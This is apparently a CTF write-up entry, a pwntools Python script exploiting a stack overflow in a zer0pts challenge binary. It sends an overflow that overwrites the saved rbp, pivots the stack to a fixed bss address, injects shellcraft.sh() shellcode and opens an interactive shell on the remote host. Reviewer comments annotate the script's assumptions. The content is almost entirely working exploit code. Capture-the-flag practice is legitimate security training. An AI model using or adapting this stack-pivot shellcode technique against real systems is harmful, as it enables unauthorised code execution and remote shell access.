Tags: pwn stackoverflow
Rating: 3.0
```
from pwn import *
# Target is a 64-bit Linux binary; log_level='debug' makes pwntools print every
# byte sent and received, which is how the expected "Data: " prompts were found.
context(os='linux', arch='amd64', log_level='debug')
# Loaded for reference only: `elf` is not used anywhere else in this script.
elf = ELF("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)
# overwrite saved rbp
# Hard-coded absolute address: the script presumably assumes the binary is not
# position independent and that this writable region is also executable
# (the shellcode placed here later is meant to run) -- TODO confirm against the
# binary's protections.
bss_addr = 0x0600234 #__stack_shadow
# 0x100 bytes of filler reach the saved-rbp slot; the pivot target is 0x100
# above bss_addr, matching the filler length used on the next read.
payload = b"A" * 0x100
payload += p64(bss_addr + 0x100)
# NOTE(review): sendlineafter appends "\n", so the remote receives one extra
# byte after the 8-byte address; also a str pattern with a bytes payload
# triggers a BytesWarning on pwntools 4.x -- `b"Data: "` avoids it.
p.sendlineafter("Data: ", payload)
# construct fake stack
# First 16 bytes of the second input: a zero qword, then a pointer to
# bss_addr + 0x10, which is exactly the offset at which the shellcode appended
# below begins if this payload lands at bss_addr (presumed; not visible here).
payload = p64(0)+p64(bss_addr+ 0x10)
# Debug aid: dumps the shellcraft assembly source before it is assembled.
print(shellcraft.sh())
payload += asm(shellcraft.sh())
p.sendlineafter("Data: ", payload)
# Hand the connection over to the user once the second input has been sent.
p.interactive()
```